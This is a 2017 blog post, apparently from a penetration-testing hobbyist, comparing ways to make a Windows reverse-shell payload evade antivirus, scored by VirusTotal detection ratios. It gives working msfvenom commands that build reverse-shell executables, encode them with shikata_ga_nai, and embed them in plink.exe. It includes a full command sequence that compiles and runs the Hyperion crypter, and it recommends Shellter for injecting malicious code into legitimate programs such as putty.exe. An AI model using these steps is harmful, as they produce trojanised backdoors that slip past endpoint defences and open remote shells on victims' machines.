Friday 10 March 2017

VirusTotal challenge

Hello everyone,

Today I would like to present several methods of antivirus mechanisms evasion.

Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.

Conclusion of the article will be comparison of efficiency generated payloads.

1. Metasploit Framework
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe
 I think that it is so potty result - 43/59 AV verified that our paylaod is malicious.

Let's try generate the same payload but with encoding
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
 The same potty result.

Now, let's try inject our malicious payload into other program.
  • msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
 Better, but still it isn't suit us.

  • cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
    cp /usr/share/windows-binaries/Hyperion-1.0.zip .
    unzip Hyperion-1.0.zip
    cd Hyperion-1.0/
    i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
    cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
    wine hyperion.exe ../backdoor.exe ../crypted.exe

 Hmmm, still to high detection ratio.

2. Veil-evasion
Veil evasion is a very useful tool which is compatible with metasploit payloads.

Let's lists payloads

Good, let's use for example payload 35.
 Quite nice! Detection ratio is lower than 50%.

3. Shellter
Shellter is the most effective tool to bypass AV detection. Shellter utilize no-malcious program such as putty.exe and incject malicious instruction.

We can use A (automation) mode. Next we have to set PE target - file which we will inject.
 Great! For me detection ratio is very low, isn't it?

As we can see shellter is very effective tool to AV evasion.